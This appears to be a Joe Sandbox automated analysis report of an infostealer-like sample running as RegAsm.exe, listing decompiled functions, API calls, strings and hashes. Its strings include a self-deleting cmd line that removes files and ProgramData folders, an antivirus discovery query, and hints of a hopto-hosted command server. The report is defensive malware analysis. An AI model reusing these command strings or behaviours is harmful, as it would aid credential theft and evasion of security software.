Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$6c8ce6f422a1d9cf34f23d1c2168e754$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 305159127-1559868639
Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

false, xrefs: 004136C5
true, xrefs: 004136A6

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

GET, xrefs: 00405325
\xA, xrefs: 00405250, 00405457, 0040539E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$\xA
API String ID: 442264750-571280152
Opcode ID: 2ad8791629c2d56ec60ae4dae2b11095def752f5e47b2107ee72084c0c569f84
Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
Opcode Fuzzy Hash: 2ad8791629c2d56ec60ae4dae2b11095def752f5e47b2107ee72084c0c569f84
Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Unknown, xrefs: 00411AA0
Unknown, xrefs: 00411A99
displayName, xrefs: 00411A6F
WQL, xrefs: 00411A28
Unknown, xrefs: 00411AB4
Select * From AntiVirusProduct, xrefs: 00411A23
root\SecurityCenter2, xrefs: 004119F0

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
String ID:
API String ID: 2891980384-0
Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418296
_memset.LIBCMT ref: 004182A5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418456
_memset.LIBCMT ref: 00418465
_memset.LIBCMT ref: 00418477
ExitProcess.KERNEL32 ref: 00418487

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

/c timeout /t 10 & del /f /q ", xrefs: 004182E5
" & exit, xrefs: 00418389
" & rd /s /q "C:\ProgramData\, xrefs: 00418333
" & exit, xrefs: 004183DA
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

wA, xrefs: 00410B21
C, xrefs: 004109DF
:\, xrefs: 00410A06
QuBi, xrefs: 00410A27

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: wA$:\$C$QuBi
API String ID: 1856320939-1441494722
Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

?, xrefs: 00411263
- , xrefs: 004113E6
%s\%s, xrefs: 004112D7

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: 5e4e021ec0192b1193050b53ddbdf8b404a91beb29f97cbda7458c2ceee8302e
Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
Opcode Fuzzy Hash: 5e4e021ec0192b1193050b53ddbdf8b404a91beb29f97cbda7458c2ceee8302e
Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9

Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
lstrlenA.KERNEL32(?), ref: 00416925

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 0041693A
lstrlenA.KERNEL32(?), ref: 00416949
lstrlenA.KERNEL32(00000000), ref: 00416962

Strings

ERROR, xrefs: 0041697E
ERROR, xrefs: 00416985
ERROR, xrefs: 00416914
ERROR, xrefs: 0041696D
ERROR, xrefs: 00416977

Memory Dump Source

